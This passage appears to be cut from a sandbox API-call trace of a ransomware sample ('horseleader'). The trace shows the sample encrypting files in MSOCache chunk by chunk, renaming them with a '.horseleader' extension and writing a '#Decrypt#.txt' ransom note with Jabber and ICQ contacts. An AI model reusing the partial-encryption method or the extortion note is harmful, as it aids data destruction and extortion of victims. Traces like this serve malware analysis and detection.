pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0209.414] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.414] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="1033", cAlternateFileName="")) returned 1 [0209.414] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0209.414] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033") returned 71 [0209.414] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0209.415] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0209.415] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0209.415] GetProcessHeap () returned 0x780000 [0209.415] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0209.415] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*") returned 73 [0209.415] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2010, 
ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x68d44c19, dwReserved1=0x884f57f4, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0209.416] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0209.416] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\.") returned 73 [0209.416] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0209.416] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x68d44c19, dwReserved1=0x884f57f4, cFileName="..", cAlternateFileName="")) returned 1 [0209.416] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0209.416] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\..") returned 74 [0209.416] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0209.416] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0209.416] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a35700, ftCreationTime.dwHighDateTime=0x1cac9d7, ftLastAccessTime.dwLowDateTime=0x6a35700, ftLastAccessTime.dwHighDateTime=0x1cac9d7, ftLastWriteTime.dwLowDateTime=0xe8691090, 
ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1a588, dwReserved0=0x68d44c19, dwReserved1=0x884f57f4, cFileName="dwintl20.dll", cAlternateFileName="")) returned 1 [0209.416] lstrcmpiW (lpString1="dwintl20.dll", lpString2="Windows") returned -1 [0209.416] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 84 [0209.416] StrStrIW (lpFirst="dwintl20.dll", lpSrch=".horseleader") returned 0x0 [0209.416] lstrcmpW (lpString1="dwintl20.dll", lpString2="#Decrypt#.txt") returned 1 [0209.417] lstrcmpW (lpString1="dwintl20.dll", lpString2="_uninstalling_.png") returned 1 [0209.417] lstrlenW (lpString=".testttjffg") returned 11 [0209.417] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll", lpSrch=".testttjffg") returned 0x0 [0209.417] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0209.417] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0209.417] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0209.417] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 84 [0209.417] StrStrW (lpFirst="dwintl20.dll", lpSrch=".txt") returned 0x0 [0209.417] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=107912) returned 1 [0209.417] 
SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0209.417] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0209.421] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0209.421] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0209.421] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xaac4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0209.421] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0209.543] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0209.543] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0209.543] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x15588, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0209.544] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0209.544] SetFilePointerEx (in: hFile=0x158, 
liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0209.544] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0209.544] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0209.544] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0209.545] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0209.545] CloseHandle (hObject=0x158) returned 1 [0209.545] GetProcessHeap () returned 0x780000 [0209.545] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0209.545] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.horseleader") returned 96 [0209.545] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll.horseleader")) returned 1 [0209.546] GetProcessHeap () returned 0x780000 [0209.546] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) 
returned 1 [0209.546] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a35700, ftCreationTime.dwHighDateTime=0x1cac9d7, ftLastAccessTime.dwLowDateTime=0x6a35700, ftLastAccessTime.dwHighDateTime=0x1cac9d7, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1a588, dwReserved0=0x68d44c19, dwReserved1=0x884f57f4, cFileName="dwintl20.dll", cAlternateFileName="")) returned 0 [0209.546] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0209.547] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\#Decrypt#.txt") returned 85 [0209.547] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0209.547] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0209.547] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0209.548] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0209.548] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0209.549] CloseHandle (hObject=0x21c) returned 1 [0209.549] 
GetProcessHeap () returned 0x780000 [0209.549] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0209.549] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="branding.xml", cAlternateFileName="")) returned 1 [0209.549] lstrcmpiW (lpString1="branding.xml", lpString2="Windows") returned -1 [0209.549] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 79 [0209.549] StrStrIW (lpFirst="branding.xml", lpSrch=".horseleader") returned 0x0 [0209.549] lstrcmpW (lpString1="branding.xml", lpString2="#Decrypt#.txt") returned 1 [0209.549] lstrcmpW (lpString1="branding.xml", lpString2="_uninstalling_.png") returned 1 [0209.549] lstrlenW (lpString=".testttjffg") returned 11 [0209.549] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpSrch=".testttjffg") returned 0x0 [0209.550] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0209.550] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0209.550] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0209.551] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 79 [0209.551] StrStrW (lpFirst="branding.xml", lpSrch=".txt") returned 0x0 [0209.552] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=596341) returned 1 [0209.552] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0209.552] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0209.556] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0209.556] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0209.556] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x464ba, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0209.556] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0210.076] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0210.076] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) 
returned 1 [0210.076] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x8c975, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0210.077] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0210.105] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0210.105] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0210.105] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0210.105] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0210.105] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0210.106] CloseHandle (hObject=0x21c) returned 1 [0210.106] GetProcessHeap () returned 0x780000 [0210.106] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0210.106] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.horseleader") returned 91 [0210.106] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all 
users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.horseleader")) returned 1 [0210.107] GetProcessHeap () returned 0x780000 [0210.107] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0210.107] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa26c9d00, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xa26c9d00, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85142d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xccb88, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="DW20.EXE", cAlternateFileName="")) returned 1 [0210.107] lstrcmpiW (lpString1="DW20.EXE", lpString2="Windows") returned -1 [0210.107] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 75 [0210.107] StrStrIW (lpFirst="DW20.EXE", lpSrch=".horseleader") returned 0x0 [0210.107] lstrcmpW (lpString1="DW20.EXE", lpString2="#Decrypt#.txt") returned 1 [0210.107] lstrcmpW (lpString1="DW20.EXE", lpString2="_uninstalling_.png") returned 1 [0210.107] lstrlenW (lpString=".testttjffg") returned 11 [0210.107] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE", lpSrch=".testttjffg") returned 0x0 [0210.107] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0210.107] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, 
pdwDataLen=0x32af044*=0x80) returned 1 [0210.107] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0210.108] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 75 [0210.108] StrStrW (lpFirst="DW20.EXE", lpSrch=".txt") returned 0x0 [0210.108] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=838536) returned 1 [0210.108] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0210.108] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0210.156] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0210.156] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0210.157] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x63dc4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0210.157] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: 